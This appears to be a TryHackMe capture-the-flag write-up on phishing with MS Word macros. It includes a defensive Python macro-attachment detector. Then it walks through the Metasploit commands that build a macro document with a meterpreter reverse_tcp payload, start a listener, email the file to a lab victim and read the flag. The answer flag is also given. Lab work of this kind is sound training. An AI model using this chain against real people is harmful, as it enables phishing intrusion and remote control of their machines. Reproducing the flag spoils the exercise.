# Day 10

## Intro to Macros

The needs of MS Office users can be vastly different, and there is no way that a default installation would cater to all of these needs. In particular, some users find themselves repeating the same tasks, such as formatting and inserting text or performing calculations. Consider the example of number-to-words conversion where a number such as "1337" needs to be expressed as "one thousand three hundred thirty-seven". It would take hours to finish if you have hundreds of numbers to convert. Hence, there is a need for an automated solution to save time and reduce manual effort.

In computing, a macro refers to a set of programmed instructions designed to automate repetitive tasks. MS Word, among other MS Office products, supports adding macros to documents. In many cases, these macros can be a tremendous time-saving feature. However, in cyber security, these automated programs can be hijacked for malicious purposes.
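A defender-side check for the macro-bearing Word attachments described above, written as an added example that is not part of the original write-up. It flags attachments that carry a VBA project or declare a macro-enabled content type, including files renamed to a macro-free extension; the function names and sample files are constructed for illustration.

```python
import io
import zipfile

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # legacy .doc/.xls compound file
MACRO_MARKERS = (b"macroEnabled", b"vnd.ms-office.vbaProject")  # content types
MACRO_FREE_EXT = (".docx", ".xlsx", ".pptx")

def macro_indicators(data: bytes, filename: str = "") -> list[str]:
    """Return the reasons an attachment should be treated as macro-capable."""
    if data.startswith(OLE_MAGIC):
        # OLE2 container: macros cannot be ruled out without parsing its streams.
        return ["legacy OLE container (may carry VBA)"]
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return []
    reasons = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            reasons.append("vbaProject.bin part present")
        if "[Content_Types].xml" in names:
            ct = z.read("[Content_Types].xml")
            if any(marker in ct for marker in MACRO_MARKERS):
                reasons.append("macro content type declared")
    if reasons and filename.lower().endswith(MACRO_FREE_EXT):
        reasons.append("extension claims macro-free format")
    return reasons

def build_sample(with_macro: bool) -> bytes:
    """Constructed sample: a minimal OOXML-shaped zip, not a real document."""
    prefix = "application/vnd.ms-word.document.macroEnabled" if with_macro \
        else "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
    types = ('<Types><Override PartName="/word/document.xml" '
             f'ContentType="{prefix}.main+xml"/></Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\x00placeholder")
    return buf.getvalue()

if __name__ == "__main__":
    samples = [("invoice.docx", build_sample(False)),
               ("invoice.docm", build_sample(True)),
               ("renamed.docx", build_sample(True)),
               ("old.doc", OLE_MAGIC + b"\x00" * 8)]
    for name, blob in samples:
        print(name, "->", macro_indicators(blob, name) or "no macro indicators")
```

A mail gateway or triage script can quarantine any attachment for which the list is non-empty, rather than trusting the file extension.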

To add a macro to an MS Word document for instance, we click on the **View** menu and then select **Macros** as pointed out by 1 and 2 in the screenshot below. We should specify the name of the macro and specify that we want to save it in our current document, as indicated by 3 and 4. Finally, we press the **Create** button.

#### Task 16 — Phishing Day 10: He had a brain full of macros, and had shells in his soul.

**1. What is the flag value inside the `flag.txt` file that's located on the Administrator's desktop?**

Use the following steps to gain access.

- I. Payload Creation
- II. Creating Listener
- III. Sending Payload and Exploiting

**I. Payload Creation**

1. Open a Terminal and type `msfconsole`
2. Now type the commands below one by one to create a Word payload.

```bash
set payload windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word_macro
set LHOST CONNECTION_IP                                   # Set your machine's IP if connected with VPN, or the AttackBox IP
set LPORT 8888
exploit
```

3. Note the location of the generated file and move the Word document to any other location.

**II. Creating Listener**

1. Now open another terminal and type the commands below to set up the listener.

```bash
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST CONNECTION_IP  # The same IP you set on the payload
set LPORT 8888
exploit
```

2. The listener is running; now we have to send the payload to the victim.

**III. Sending Payload and Exploiting**

1. In your browser, paste your TryHackMe machine IP into a new tab and log in with the credentials that were given to you.
2. Create a new mail and use `marta@socmas.thm` as the receiver.
3. Add a dummy subject and attach the Word document payload that we created.
4. Now wait until the victim clicks it.
5. Once you get the reverse connection, type the command below to read the flag.

`cat c:/users/Administrator/Desktop/flag.txt`

or

`cd c:/users/Administrator/Desktop` and type `cat flag.txt`

```
Ans: THM{PHISHING_CHRISTMAS}
```

